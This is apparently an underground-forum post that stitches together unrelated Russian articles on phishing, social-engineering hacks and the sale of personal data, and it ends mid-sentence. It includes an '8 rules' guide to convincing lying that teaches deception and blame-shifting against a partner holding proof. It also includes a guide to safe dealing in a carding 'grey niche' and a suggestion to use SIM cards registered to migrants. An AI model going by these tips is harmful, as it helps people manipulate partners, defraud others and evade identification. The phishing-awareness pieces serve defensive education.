Просьба сотрудников самостоятельно скачать и установить Kaspersky Endpoint Security. В конце месяца в ходе плановой проверки будет произведена активация средства специалистами нашего отдела.
Click to expand...
Отдел технической безопасности таксопарка "Тимошинский".
Click to expand...
Как хорошо, что мошенники стесняются использовать спеллчекеры. Это помогает выявлять ересь в инбоксе и стирать её, не дочитывая. Естественно, ссылка ведет не туда — хотя и тоже на экзешник.
Неизвестные рэп-исполнители и где они обитают
Скорее жмем ссылку, смотрим, а там...
Эта бригада студентов решила обозначить то, как поймать человека на фишинге. Это не лишено смысла — здесь важно понимание механики процесса, поэтому лабу я им, хоть и не без колебаний, засчитал.
Повторю ещё раз — не вводите никакие данные о банковских картах на непроверенных сайтах.
Съемки в рэперском клипе
Захожу, полный решимости сняться в клипе, а там:
> Error: This account has been suspended.
Details about the account owner:
Click to expand...
Name: Phishing Detected
Click to expand...
Username:
Click to expand...
Email: rap.ruXXXX@gmail.com
Click to expand...
Как видите, сервисы борются с фишингом еще до того, как я о нём рассказал на Хабре. Поэтому о том, что было на сайте, я узнал только из отчёта. Как-нибудь в другой раз расскажу о том, как я принимаю отчёты, — это отдельная большая история.
Истеричный тест-драйв
Kia Центр Санкт-Петербург cообщает, что вам выпал уникальный шанс взять в аренду совершенно новый автомобиль Kia Quoris. Это абсолютно новая модель бизнес-класса, с соверешенно новым двигателем и переработанной системой подвевски и трансмисси. И что самое главное, вы получаете беспрецедентную возможность получить данный автомобиль на целый МЕСЯЦ!!! В личное пользование!!! Проедьте на нем в городе, опробуйте дальние поездки, оценить качество и надежность нашего нового автомобиля!
Click to expand...
Ещё в письме была красивая картинка с этим автомобилем и ссылка на онлайн- форму для получения разной информации.
Студент использовал и информацию о том, что персонаж ездит на машине друга, и подогрел интерес потенциальной жертвы тем, что осталось всего 3 машины. В общем, самое время бежать-торопиться и записываться на бесплатный тест-драйв.
А лучше вспомнить, что ничего бесплатного в интернете не бывает, и не вестись на сомнительные письма.
Как выглядит фишинг в дикой природе
Все примеры выше — фантазия моих студентов, и к реальности они относятся только тем, что все их можно написать и отправить. Защититься при этом довольно легко — достаточно внимательно проверять ссылки, не скачивать посторонние файлы из вложений и обращать внимание на опечатки в текстах. А если не вводить никаких персональных данных на непонятных сайтах, то и вовсе можно прожить всю жизнь и не узнать, как это, когда у вас воруют деньги или берут микрокредит на скан паспорта.
Я попросил коллег из СБ показать настоящие фишинговые письма, которые прямо сейчас живут в дикой природе. Это всего лишь пара примеров, которые покажут, что мошенники могут идти на очень разные ухищрения, чтобы получить ваши деньги. Фактически их гораздо больше, поэтому нужно быть готовыми ко всему.
Ваш кошелек пополнен
Пользователю приходит сообщение о том, что его кошелёк пополнен. В комментарии к платежу — рекламная подводка и ссылка на сайт, где якобы можно получить тысячу долларов в день, ничего для этого не делая.
Оказывается, мошенники могут не только подделывать такие письма. Дело в том, что подделанное письмо с большой вероятностью не пройдёт через спам-фильтр в почте. А вот автоматическое письмо от сервиса, сформированное после реального микроплатежа на счёт может и дойти.
Ссылка из комментария, как правило, уводит на сайт, где у населения пытаются сравнительно честно отнять деньги.
Ваш IP-адрес был внесён в список
Письмо якобы от техподдержки Яндекс.Денег. Как его отличить от настоящего вы уже знаете — спасибо Наташе.
Что ещё бывает?
Фишинг — это, конечно, не только про письма.
Один из примеров чего-то кроме нам прислал читатель блога. Представьте — это мошенническая реклама в инстаграме, которая ведёт на мошеннический паблик в VK, который ведёт на мошеннический лендинг с мошенническими опросами, за которые якобы платят мошеннические деньги.
Конечно, в действительности не платят.
Это ненастоящая реклама.
В этой цепочке даже есть условие «отправь ссылку 20 друзьям в WhatsApp, чтобы
продолжить». А ведь когда маячат большие деньги, очень сложно сдержаться.
В какой-то момент, после множества вопросов в духе «Какая марка авто вам
больше нравится?» и фальшивых отзывов якобы настоящих людей (ну вот те, с
фотостоковыми аватарками) незадачливого пользователя порадуют новостью:
«Вы заработали 80000 рублей, но мы не можем перевести их одним платежом —
только двумя. Поэтому вам нужно заплатить 150 рублей за пересылку денег».
Конечно, никто ничего не переведёт, поэтому и вы ничего не переводите.
А как защищаться?
Вот несколько простых советов:
Покажите эти правила друзьям, знакомым и, особенно, старшим родственникам. И спасибо, что дочитали до конца. Не дайте себя обмануть.
Автор: Евгений Шкляр aka evil_me
habr.com
Азбука наш друг.
Как бы это банально не звучало, но кидалу можно заметить издалека по «почерку». Первым делом следует обратить внимание на орфографию и пунктуацию объявления селлера. Довольно большой процент кидал – это обычные школьники. Их легко вычислить по большому количеству орфографических ошибок и отсутствию знаков препинания. Тем более проверенный селлер очень много времени проводит в сети и ведёт общение посредством текстовых мессенджеров – а тут хочешь – не хочешь, грамотность со временем начинает подниматься выше уровня начальных классов. Также сомнительно доверять человеку, который не может запомнить простое правило жи-ши, но по его словам, сумел освоить сложнейшую схему по кардингу айфонов в промышленных масштабах.
Такой большой, а всё в сказки веришь.
Перестаньте верить в сказку. Каждый день появляется множество топиков по продаже того или иного рода товаров или услуг по ценам, гораздо ниже «рыночных», даже в нашей серой нише. Да, возможно, что селлер просто решил устроить небольшой демпинг на рынке, но никто не будет работать в убыток. Если вы прекрасно понимаете, что данный товар или услуга гораздо ниже в цене, чем подобные предложения на рынке – это повод задуматься. Можете даже примерно подсчитать какие затраты несёт селлер и вычесть это из конечной стоимости, также учитывайте риски и возможный процент брака. Проще говоря – ликвидный товар вам никто за полцены не будет продавать, как и трудоёмкую услугу за бесценок делать не будет. Хватит верить в деда мороза, честных чиновников и айфоны за полцены.
Вежливость, как правило хорошего тона.
Как уже говорилось – грамотность не свойственна кидалам. Точно так же как им не свойственна и вежливость в общении. Если стоит в топике только появится комментарию о сомнительности предложения, как селлер на него набросится чуть ли не с кулаками – это не может не настораживать. Неугодные комментарии приводят в ярость кидалу и он начнёт доказывать свою правоту брызжа слюной и пытаясь всячески унизить оппонента. Ещё бы, ведь доверие к нему подрывается и вероятность его профита идёт по наклонной вниз.
Конечно бывают и неадекватные комментарии и откровенный бред, но селлеры уже поняли, что доказывать неадекватным юзерам что-либо бесполезно и просто игнорируют такой бред. Кидалы же не упустят такого момента, чтобы вступить в полемику. Тем более существует негласное правило «не хочешь – не бери», которого придерживаются грамотные и адекватные селлеры. Вежливость и адекватность селлеров - подкупает и располагает к новым сотрудничествам и в будущем. Кидалам же это ни к чему, по этому и ждать лояльности в большинстве случаев от них не стоит.
Гуглить, гуглить и ещё раз гуглить.
Кидалы люди по своей натуре очень ленивые, собственно это и подталкивает их к такому промыслу. Зачастую они ленятся даже изменить свой ник, контактные данные, платёжные реквизиты или даже полностью текст своего объявления. Но и люди, попавшиеся на уловку кидал, в большинстве своём такие же лентяи. Иначе как объяснить тот факт, что просто вбив в поисковик контактные данные селлера, на первой же странице поиска можно обнаружить подобные темы или же арбитражи на недобропорядочного селлера? Уберечься от кидалы можно буквально за минуту, но многие пренебрегают этим простым способом проверки. Гуглить, гуглить и ещё раз гуглить.
В поисковике можно найти много чего интересного: отзывы о селлере на других бордах, арбитражи, блеклисты и многое другое. Также можно потратить ещё несколько минут и поискать информацию о борде, на котором вы собираетесь совершить сделку, ведь кидалы-профи имеют в своём распоряжении целые форумы – ccc.gsи его клоны – яркое тому подтверждение. Поиск займёт несколько минут вашего времени, но позволит сэкономить ваши кровные накопления и уберечь вас от позорного клейма «лох».
Репутация и отзывы.
Естественно большего доверия вызывают селлеры с проверенной репутацией, ведь в наше время очень трудно среди огромного количества подобных тебе селлеров заработать репутацию и очень легко её потерять из-за одного арбитража. Просмотрите внимательно тему, отзывы и кто оставлял эти отзывы. Сомнительно выглядит топик, в котором после нескольких часов прошедших с его создания, появляются комментарии на подобии «работал с селлером без гаранта, всё сделано в лучшем виде, можно доверять».
Да ещё и если эти комментарии оставлены юзерами с вчерашней регистрацией и двумя-тремя сообщениями, больше похожими на флуд. Большинство селлеров работают на нескольких бордах и сразу дают ссылку на отзывы о своей работе. Не брезгуйте спросить их об этом, если они сами не сделали этого. Ну или, опять же, потратьте пару минут, чтобы погуглить.
Гарант – наше всё.
Наверно ключевое правило безопасной сделки – Гарант. Сейчас практически каждая площадка обладает своим Гарант-Сервисом. Цена их услуг составляет обычно не более 5-10% от суммы сделки, но встречаются и полностью бесплатные. Однако не стоит экономить. Проводите все свои сделки через ГАРАНТ. Прямой отказ селлера/покупателя от Гаранта – это кидок. Но некоторые кидалы не идут в прямой отказ, а предлагают вам провести сделку через Гарант-Сервис какого-либо приватного борда (коровка, вериф и т.п.), с обоснованием, что якобы они не доверяют другим бордам.
Под этим предлогом вам могут дать контакт (icq, jabber) гаранта приватного борда. Обычно кидала вам подсунет внешне похожий контакт ( в jabberнапример можно заменить английскую букву на русскую – это будет уже другой контакт) и предложит провести сделку через него. Скорее всего это просто второй контакт кидалы. Практически на всех приватных бордах сделки проводятся только посредством личных сообщений на форуме. Если у вас нет регистрации на борде, через который предполагается провести сделку, смело отказывайтесь и не верьте, что данные вам контакты – это действительно гарант приватного борда.
Также стоит помнить, что бдительность терять нельзя никогда, даже когда вы думаете, что ваши деньги надёжно защищены Гарантом. Кидала может прислать вам в личку файл – фото якобы приобретаемого вами товара, софт необходимый для обучения или exсelфайл с расценками на товар. С файлом же может быть просто склеен троян, который передаст все ваши пароли кидале и он зайдя с вашего аккаунта даст отмашку Гаранту о удачном проведении сделки и перечислении ваших кровных сбережений ему. Да, согласен, звучит немного параноидально, но я бы не упомянул об этом, если бы не было такого прецедента. Так что советую не принимать и тем более не открывать никаких файлов. Фото всегда можно разместить на хостингах для просмотра, файл с расценками написать в txt, а софт следует запускать на дедике.
© copyright
Целенаправленный взлом — серьезная штука: даже опытным пользователям
крайне нелегко защитить себя от таких атак. И все дело в том, что с каждым
днем все больше разных аспектов нашей жизни становятся связанными с Интернетом
и другими сетями.
Практически у всех есть электронная почта, аккаунты в соцсетях и мессенджерах.
Люди заказывают всевозможные товары онлайн, подключают интернет-банки,
постоянно используют мобильную связь, в том числе и для идентификации личности
(например, через двухфакторную аутентификацию). Список можно продолжать
бесконечно. К сожалению, ни одна из этих систем не является полностью
безопасной.
Проблема в том, что чем больше та часть жизни, которую люди перенесли в
онлайн, тем больше пространства для маневра появляется у потенциального
вредителя. Специалисты по кибербезопасности называют это явление «поверхностью
атаки». Чем больше поверхность — тем проще атаковать.
Как это работает и чем грозит, можно понять на примере нескольких инцидентов,
которые, хоть и напоминают сюжет фантастического детектива, на самом деле
произошли в 2014–2016 годах.
Как украсть чужой аккаунт: взломать или просто позвонить по телефону?
Один из самых мощных приемов — это «взлом человека», или социальная инженерия.
24 февраля 2016 года редактор интернет-портала Fusion Кевин Рус решил в
очередной раз проверить, так ли это. Продемонстрировать возможности социальной
инженерии и классического компьютерного взлома на своем примере Кевин Рус
попросил хакера Джессику Кларк (Jessica Clark) и специалиста по безопасности
Дэна Тентлера (Dan Tentler).
Джессика вызвалась взломать электронную почту Кевина по телефону и блестяще
справилась с этой задачей. Вначале ее команда собрала на Руса досье, в котором
на тринадцати страницах рассказывалось, что он за человек, чем увлекается,
какие у него привычки и тому подобное. Вся информация была собрана из открытых
источников.
Подготовившись, Джессика клонировала мобильный номер Кевина и позвонила в
телефонную компанию, которой он пользовался. Кроме того, она нашла аудиозапись
ревущего младенца и использовала ее в качестве фона, чтобы создать напряженную
обстановку.
Джессика представилась женой Руса. Согласно легенде, они с мужем пытались
получить заем, но дело подвисло, когда молодая замотанная мама забыла адрес их
общей электронной почты. Под аккомпанемент громкого детского плача она
довольно быстро добилась того, чтобы ей сообщили адрес почты Кевина, а затем
уговорила службу поддержки сбросить пароль от этого аккаунта.
Дэн Тентлер справился со своей задачей с помощью фишинга. Вначале он отправил
Русу поддельное электронное письмо от Squarespace, так как именно на этой
площадке Кевин вел свой блог. В письме администраторы Squarespace якобы
просили пользователей установить SSL-сертификат в «целях повышения
безопасности». Только вместо того, чтобы защитить что-либо, этот файл открыл
Тентлеру доступ к компьютеру Кевина. После этого Дэн воссоздал на компьютере
журналиста несколько сервисных уведомлений, с помощью которых узнал вообще все
необходимое.
За два дня Тентлер получил доступ к банковским данным Руса, логину и паролю
от электронной почты и аккаунтов в нескольких магазинах, а также к номеру
социального страхования и кредитной карты. Кроме того, Дэн обзавелся
коллекцией снимков Руса и его рабочего стола, которые за эти двое суток
делались автоматически каждые две минуты.
Как ограбить программиста за одну ночь
Весной 2015 года программист Патрап Девис лишился $3000. За несколько коротких
ночных часов неизвестный взломщик успел получить доступ к двум его email-
адресам, телефону и Twitter-аккаунту, обойти систему двухфакторной
аутентификации Google и в результате добраться до вожделенных Bitcoin-
кошельков. Как вы можете себе представить, Девиса ждало пренеприятнейшее утро.
Следует отметить, что Патрап — довольно сознательный интернет-пользователь: он
всегда выбирает сложные пароли и не переходит по вредоносным ссылкам. При
входе в почту он использует двухфакторную аутентификацию, а при каждой
авторизации с нового устройства вводит шестизначный код, который приходит ему
в SMS на мобильный телефон.
Сбережения Дэвис хранил в трех защищенных Bitcoin-кошельках. Двухфакторная
аутентификация при входе в эти сервисы осуществлялась не через SMS, а при
помощи мобильного приложения Authy. В общем, Девис использовал все разумные
меры безопасности. Увы, это не спасло его от взлома.
После произошедшего разозленный Патрап потратил несколько недель на то, чтобы
найти виновного. Кроме того, он связался с редакцией The Verge, и вместе им
удалось кое-что выяснить.
В качестве основной почты Девис использовал ящик
Patrap@mail.com и настроил с него пересылку на менее
запоминающийся адрес на gmail, так как
Patrap@gmail.com был уже занят. С этого и начался
взлом.
В течение нескольких месяцев на одном из хакерских ресурсов (а именно на
Hackforum) продавался скрипт для сброса паролей пользователей Mail.com. По
всей видимости, именно им и воспользовался взломщик, чтобы обойти
двухфакторную авторизацию и заменить пароль Девиса на свой собственный.
После этого преступник запросил новый пароль от аккаунта Девиса на сайте
мобильного оператора и попросил службу поддержки включить переадресацию всех
входящих звонков на новый номер в Лонг-Бич. Техподдержке хватило подтверждения
по электронной почте, чтобы передать контроль над всеми входящими звонками в
руки хакера. Получив такой мощный инструмент, взломщик без проблем обошел
двухфакторную авторизацию Google.
Хотя SMS по-прежнему приходили на старый номер Девиса, это его не
спасло. Хакер использовал услугу Google, позволяющую людям с плохим зрением
вместо SMS заказать телефонный звонок и ввести одноразовый код под диктовку
робота. После этого между взломщиком и заветными Bitcoin-кошельками стояло
только приложение Authy.
Чтобы обойти эту преграду, преступник переустановил приложение на свой телефон
и авторизовался в нем, отправив письмо на заранее взломанный email и введя
новый код подтверждения, который он получил с помощью того самого голосового
звонка. Преодолев все преграды, неизвестный поменял пароль от одного из трех
Bitcoin-кошельков Девиса и вывел все деньги.
Деньги на оставшихся двух кошельках уцелели исключительно благодаря
перестраховке сервисов. Один позволял выводить деньги только спустя 48 часов
после смены пароля, а второй потребовал копию водительских прав — заполучить
их хакеру так и не удалось.
Зловещий троллинг в реальной жизни
Как в октябре 2015 года написал американский интернет-портал Fusion,
разрушение личной жизни четы Стратер началось с пиццы. Несколько лет назад ее
начали привозить к ним домой из всех окрестных кафе и ресторанов, в разное
время дня и ночи, притом что никто в доме ее не заказывал. Приходилось
извиняться и отказываться ее принять.
Вскоре кроме пиццы к ним домой стали доставлять букеты с цветами, грузовики с
сыпучими грузами, эвакуаторы и множество других ненужных товаров и услуг. И
это было только начало — следующие три года превратились для семьи в настоящий
кошмар.
Пол Стратер, старший инженер на местной ТВ-станции, и его жена Эми, бывший
главный врач, стали жертвами неизвестного хакера или группы хакеров, не
поладивших с их сыном Блэром. От имени старших Стратеров было отправлено не
одно письмо с угрозами взорвать бомбу, убить заложников или перестрелять
учащихся начальной школы. Полиция стала частым гостем в их доме, что вызвало
непонимание и подозрение у соседей.
Преступники даже взломали официальный Twitter-аккаунт Tesla Motors и опубликовали объявление, в котором предлагали позвонить семье Стратер, чтобы получить бесплатный автомобиль Tesla.
В те выходные Эми и Блэр получали до пяти звонков в минуту от поклонников
Tesla, желающих обзавестись машиной «по акции». Один из них даже пришел к ним
домой и потребовал открыть гараж, так как подозревал, что его драгоценный
седан спрятан именно там.
Пол попытался прорвать осаду: поменял пароли во всех своих аккаунтах,
условился с окрестными службами доставки о том, что товары будут доставляться
к ним лишь после полной предоплаты, и договорился с полицией, что те будут
перезванивать к ним домой, прежде чем приезжать по вызову. Где-то посреди всех
этих неприятностей брак Эми и Пола распался.
Атаки продолжались. Аккаунты Эми в социальных сетях были украдены, от ее
имени преступники опубликовали серию расистских заявлений. Вскоре после
очередной мерзкой публикации Эми Стратер потеряла работу. Ее уволили, несмотря
на то что она заранее рассказала начальству о кошмаре, в который превратилась
ее жизнь.
Со временем Эми вернула контроль над своей учетной записью в LinkedIn, а
Twitter спустя еще большее время получилось удалить. Но из-за того, что было
написано в этих соцсетях, Эми не могла найти работу по специальности —
больницы предпочли просто не связываться с человеком, попавшим в неприятную
ситуацию. Так что она была вынуждена подрабатывать таксистом в Uber, чтобы
покрыть ежедневные расходы. К сожалению, денег не хватало, чтобы платить за
дом.
«Раньше, когда вы искали в Google ее имя, то находили ее научные статьи и
информацию о том, какие хорошие вещи она сделала, — рассказывает сын Эми —
Блэр. — А теперь там только хакеры, хакеры, хакеры».
Некоторые винят в произошедшем Блэра Стратера, вращавшегося среди
киберпреступников и не поладившего то ли с одним, то ли с несколькими из них.
Но в случае с семьей Стратер за «грехи» сына расплачиваются родители, которые
уж точно ни в чем не виноваты.
Эти истории показывают, что от целенаправленного взлома уберечься практически невозможно. Поэтому, если вам есть что скрывать, не стоит переносить это в Интернет.
[(c)](https://telegra.ph/Vzlom-grabezh-i-izdevatelstva-s-pomoshchyu-interneta- i-SI-01-21)
![](/proxy.php?image=https%3A%2F%2Fwww.hs- academypages.com%2Fhubfs%2Flp%2Facademy%2Fphishing.png&hash=3168c493bae4fec6b0fcb2338b53af53)
8 простых правил, которые научат вас “красиво” врать
1. Найдите весомую причину для лжи
Секрет успешной лжи достаточно прост: лгать следует как можно реже, тогда,
когда вы ощущаете острую необходимость в этом.
Лжец с опытом хранит свое оружие втайне и пользуется им в исключительных
случаях, когда понимает, что настал тот самый момент, когда можно использовать
обман для получения выгоды.
Запомните, что репутация добропорядочного человека — это то самое сокровище,
которое дает возможность говорить неправду практически безнаказанно.
2. Легенду следует продумывать заранее
Согласитесь, достаточно трудно придумывать небылицу на ходу, когда на тебя
устремлены все взгляды.
Существует еще один метод заложить прочный фундамент лжи: ищите себе
сообщников. Так, например, товарищ, который подтвердит, что вы сидели на
работе до конца, пока директор в командировке, что вы ожидаете свою тетю,
которая хочет придти к вам домой и забрать свое нижнее белье, оставленное в
ванной.
3. Используйте правду
Тяжелей всего выявить такую ложь, которую невозможно отличить от истины. По
большому счету, вы говорите правду, но оппонент уверен в обратном. Это метод
частичного утаивания какой-либо информации.
В некоторых случаях работает способ прямого натиска. Якобы шутя, вы говорите о
том, в чем вас пытаются уличить. Так, к примеру, на вопрос от своей девушки,
где вы так долго были после работы, ответьте ей, что всего-навсего были в бане
с ее лучшими подругами. Выявлено, что самые убедительные лжецы — это те,
которые могут предвосхищать любые расспросы.
4. Используйте больше деталей
Наличие деталей гарантирует то, что вам будут больше доверять. Так, к примеру,
собеседник может не поверить в то, что вы застряли в лифте на 1.5 часа,
поэтому не пришел на встречу. Но зачем он рассказывает в таком случае, что
вызванный слесарь напевал конкретную песню.
5. Не бойтесь клеветать на себя
Начинающие лжецы, как правило, оправдываются избитыми и нелепыми выдумками о
заболевшем сотруднике или о том, что его автобус попал в аварию.
Люди на дух не переносят подобные оправдания. Достаточно трудно поверить тому,
кто пытается показаться бескорыстнее, чем вы. Таким образом, когда вам нужно
лгать, ложь должна выставлять вашу персону не в самом выгодном свете для вас.
6. Лгать нужно складно
Говорить неправду, на самом деле, не так то и просто. Нужно иметь отличную
память, логическое мышление и быть профессиональным рассказчиком. Как правило,
лжецы попадаются на мелочах.Следите за цепочкой своего вранья и не потеряйте
нить разговора.
7. Владейте собой
Замечено, что обманщики заикаются, трут носы, не смотрят в глаза. Однако
опытные лжецы досконально владеют собой и своими эмоциями. Отметим также, что
уровень доверия к собеседнику зависит не столько от информации, которую они
слышат, сколько от убедительности того, как они ее преподносят.
8. Наступайте, когда вас уличили во лжи
Итак, годами вы обманывали человека. И вдруг у него в руках оказываются
неопровержимые доказательства вашей лжи. Что делать в таких ситуациях? Терять
уже особо нечего. Все, что вам нужно — это выиграть немного времени для того,
чтобы продумать новую тактику поведения.
Переходите в наступление. Допустим, ваша девушка нашла переписку в социальных
сетях с представительницами другого пола. Безусловно, она будет требовать
объяснений.
Ни в коем случае не признавайтесь в своих грехах. Наоборот, обвините ее в том,
что она не имела права читать вашу переписку и что ей вовсе наплевать на вас.
Постарайтесь повернуть разговор в другое русло, чтобы лишить собеседника
душевного равновесия и уверенности в своей правоте.
Мы рассмотрели с вами восемь простых правил при “красивой” лжи. Примите их к
сведению, но не злоупотребляйте! Удачи вам!
Во всем мире сейчас принимается много усилий с целью обеспечить безопасность персональных данных. Россия тоже не отстает, с энтузиазмом внедряя десятки законов, сотни подзаконных актов и регламентов. Есть ли результат?
Приведенное ниже исследование показывает, что в России и на всем пространстве
бывшего СССР написанные на бумаге законы этой области тщетны. Итоги ужасны:
доступ к персональным данным физических и юридических лиц, банковской тайне,
коммерческой тайне, имеют не только компании и государственные ведомства, но и
любые мошенники. Все покупается и продается за цену уровня от пары чашек кофе
до пары средних смартфонов.
Сегодня персональные данные активно продаются на ряде форумов, где есть
продавцы, покупатели и даже целые системы арбитража, призванные разрешать
возможные споры между оными. Мошенники умудрились построить очень мощную
криминальную инфраструктуру.
«В даркнете?» — подумали вы. Вот и не угадали. Эти сайты находятся в публичном доступе и даже могут быть не внесены в многострадальный реестр Роскомнадзора (кто бы сомневался). Конечно, некоторые из них действительно имеют зеркала в даркнете, но это лишь зеркала.
Речь в статье пойдет именно об этих сайтах и о тех «услугах», которые перечеркивают абсолютно всю бурную государственную движуху-показуху вокруг защиты персональных данных в последние годы.
Сотовые операторы
Посмотрите на эту картину, типичный форум, типичные услуги:
Имена «продавцов» и названия операторов на приведенном скриншоте скрыты. Но об
операторах вы легко догадаетесь сами, в России их не так много. Пробиваются
все без исключения.
Самое базовое — это пробив данных владельца номера: ФИО, паспортные данные,
адрес. Как эти данные будут использоваться — зависит только от фантазии
мошенника, к которому в руки они попадут.
Далее ещё интереснее. «Услуги» более высокого уровня: отслеживание
местоположения человека по вышкам сотовой связи, история местоположений,
детализация звонков, детализация sms. Похоже, только звукозаписей звонков не
хватает (может, я плохо смотрел).
Очень впечатляет наблюдать, что любой мошенник может получить доступ к такой
информации. Остается догадываться, реализуется это средствами самих сотовых
операторов, либо через внешние интерфейсы, которые могут находятся у
государственных служб (в существовании таких я даже не сомневаюсь).
Лишний раз подумайте, оформляя сим-карту на свои паспортные данные при покупке. Может быть и правда лучше взять симку, оформленную на noname- приезжего из Средней Азии? Из известных мест продажи они никуда не исчезали. Передавая паспортные данные, вы идентифицируете себя не только перед сотовым оператором и государственным органами, но и перед любым преступником, которому не жалко потратить на вас стоимость пары чашек кофе, а то и чего побольше.
Государственные органы
Пожалуй, ничто не сравнится с объемами данных, которые известны о нас
различным государственным ведомствам. Тысячи сотрудников имеют к ним доступ,
результаты чего обильно просматриваются на форумах:
С одной стороны, вырисовывается четкая картина, какой информацией о нас
обладают эти ведомства и с какой легкостью сотрудники могут собрать полное
досье на любого человека. С другой стороны еще более живописная картина
маслом: любой мошенник может собрать точно такое же досье.
Типичная услуга по автотранспорту:
Стандартный пример вопрос-ответ:
Еще стандартно по разным ведомствам:
Наибольшей популярностью пользуется услуга выгрузки из баз Магистраль, Сирена, Граница, Мигрант, Кронос, Спарк, Поток, комплексных баз ИБДР-ИБДФ. Я даже таких названий раньше не знал. Пробивается все, до чего дойдет фантазия, даже ПФР.
Банки
Отдельная категория «услуг» посвящена детализации банковских счетов и движению
средств на них. Часть специализируется по счетам физических лиц.
Но еще больше — по юридическим лицам. Здесь мошенничество переходит в
изощренные формы промышленного шпионажа и откровенного криминала. Скриншоты
выкладывать не буду, так как криминальный «комплекс услуг» выходит сильно за
рамки утечек данных.
Откуда берутся эти чудовищные факты массового нарушения не то что бы законов о персональных данных, а о банковской тайне? Честно, я реально удивляюсь, что коррупция настолько повальная. Похоже, достаточно просто посмотреть все должности, где сотрудник имеет доступ к хоть каким-то данным клиентов — мошенник может находиться на любой. Вопрос лишь в том, куда смотрят службы безопасности.
Нет смысла перечислять наименования самых "отличившихся" банков, они и так у всех на слуху. По моим наблюдениям, чем меньше банк — тем меньше вероятность того, что на форумах будут касающиеся его мошеннические услуги.
Продается и покупается абсолютно все
В своем расследовании я практически не касался информации, которая собирается и сливается о нас сетевыми магазинами электроники, одежды и обуви, питания, фитнес-клубами. Все это тоже продается, так что лишний раз подумайте, стоит ли оставлять реальный адрес и номер телефона, оформляя очередную дисконтную или клубную карту.
Любопытный факт: активно продаются базы пользователей букмекеров-форексов-
опционов, услуг экстрасенсов-гадалок-ворожей, покупателей БАД-ов, средств для
похудания и повышения потенции. Целевые аудитории этих специфичных продуктов
настолько кристаллизовались, что эти базы переходят из рук в руки, постоянно
дополняются и поддерживаются в актуальном состоянии. Бизнес просто огромный по
своему масштабу.
Не так плачевно, когда сливаются персональные данные, которые мы оставляем
добровольно — просто соблюдай меры осторожности и не оставляй их. Гораздо
хуже, когда сливаются те данные, не оставить которые мы в принципе не можем.
Покупкой сим-карт без паспорта все проблемы не решишь.
В 2017 году я читал публикации российских оппозиционеров (в частности, Леонида Волкова leonwolf), которые столкнулись с преследованием агрессивно настроенных криминальных элементов, внезапно получивших информацию обо всех перелетах и передвижениях. Этакие ждущие возле аэропорта мордовороты с битами и аккомпанементом в виде шоу-представления щедро оплаченных псевдосторонников власти с флагами и кричалками. В Украине их всех в свое время обобщенно называли титушками.
Почему так? Откуда титушки узнали про перелеты оппозиционеров? Все просто:
потому, что доступ к базе перелетов покупается и продается так же, как и
доступ ко всем остальным базам.
Скептический читатель может подумать: ты же говоришь про оппозиционеров, то
есть людей, которые представляют определенную политическую позицию, их
деятельность по определению сопряжена с рисками. И будет неправ: криминальный
беспредел может коснуться каждого. Масштабы данных о нас, которые валяются
на дороге, вы видите своими глазами.
Почти у каждого есть смартфон, у каждого есть счет в банке, многие пользуются
авто, многие часто перемещаются авиатранспортом, у многих бизнес на просторах
пост-СССР. Вне зависимости от вашего социального статуса и политической
ориентации: вы в опасности потому, что ваши данные никем и ничем не защищены
, а у преступников абсолютно развязаны руки. То, что раскидано по форумам в
виде коммерческих объявлений, на самом деле может быть получено «по звонку»
имеющими связи людьми. России это касается в первую очередь.
Многие вспомнят случай с Антоном Уральским в 2008 году и выложенным звонком интернет-провайдеру Стрим: «не было не единого разрыва!» Все тогда посмеялись, не задумавшись, что сотрудники совершили преступление, выложив аудиозапись разговора с клиентом в интернет. Второе преступление они совершили, выложив и персональные данные Антона, которые стали достоянием сотен пранкеров, испортивших человеку жизнь.
Тогда, в 2008 году, тоже были законы о персональных данных, хоть и не такие подробные, как сегодня. Как видите, за 10 лет ничего в лучшую сторону не изменилось, хоть и бумаги на законы потрачено несравненно больше. Все еще сильнее криминализовалось и даже встало на коммерческий поток с проработкой всех сопутствующих мошеннических «бизнес-процессов». Где раньше был «прикол», откровенная глупость и мелкокриминальные наклонности, сегодня финансовая выгода, холодный расчет и целая криминальная инфраструктура.
Послесловие
В этой статье я затронул лишь вершину пирамиды, не более 2% всей правды. Копая тематические ресурсы дальше, можно найти такие вещи, как криминальные «услуги» по удаленной блокировке сим-карт, перехвату sms, блокировке банковских счетов, всесторонней парализации работы компаний, любой криминальный каприз за ваши деньги. Везде замешаны либо сотрудники ведомств, либо сотрудники разного звена в коммерческих компаниях.
Кстати, с мобильными операторами есть еще ряд любопытнейших «услуг»: мошенники используют уязвимости сотовых сетей с целью геопозиционирования всех зашедших на сайт с мобильного интернета пользователей, подключения платных подписок, и сугубо для себя — полного обхода учета мобильного трафика (речь не о ерунде вроде раздачи интернета при закрытом tethering, а полном отключения учета скачанного на лимитированных тарифах). На удивление, корни тут растут отнюдь не с черных около-даркнетных форумов, а со всем известного в рунете форума 4pda.
Большая часть статьи была посвящена России, российским организациям и ведомствам. Читатели из Украины наверняка уже привыкли, что в русскоязычном интернете большинство плохих новостей обычно касается их северного соседа. К сожалению, на этот раз не смогу разделить вашего оптимизма: предложение описанных в статье «услуг» по Украине находится на ничуть не меньшем уровне, чем по России. Даже уровень цен такой же.
По моим наблюдениям, сильно меньше предложений по Беларуси и Казахстану. Может быть, плохо искал, но дело явно не в более низком уровне преступности. На мой взгляд, все гораздо прозаичнее: предложение пропорционально численности жителей, ведь в Беларуси и Казахстане живет людей сильно меньше, чем в России и Украине.
Тем временем простым российским, украинским, беларуским и казахстанским владельцам малого бизнеса надзорные ведомства с удовольствием выпишут штраф за неправильную форму бланка согласия на обработку персональных данных, а сами с не меньшим удовольствием сольют всю базу, в которой вы, ваши персональные данные, данные вашего бизнеса, ваших клиентов, и даже ваш штраф будут отлично отражены.
You must have at least 3 reaction(s) to view the content.
Слив . Если уже было просьба просто удалить тему
Много веков назад монах Шварц Бертольд изобрел «порошочек для забавы», который
стал порохом — причиной глобальных войн. Так и инструменты социальной
инженерии: они настолько мощные, что используются даже в крупнейших аферах
киберпреступников.
В этой статье рассмотрим реальные примеры атак психологическими методами.
Кейс первый. Не в службу, а в дружбу
В 2007 году одна из самых дорогих систем безопасности в мире была взломана.
Без насилия, без оружия, без электронных устройств. Человек забрал из
бельгийского банка ABN AMRO алмазов на 28 миллионов $ своим обаянием.
Мошенник Карлос Гектор Фломенбаум , человек с аргентинским паспортом,
украденным в Израиле, завоевал доверие сотрудников банка ещё за год до
инцидента. Выдавал себя за бизнесмена, дарил шоколадки. Однажды сотрудники
предоставили ему доступ к секретному хранилищу драгоценных камней, оценённых в
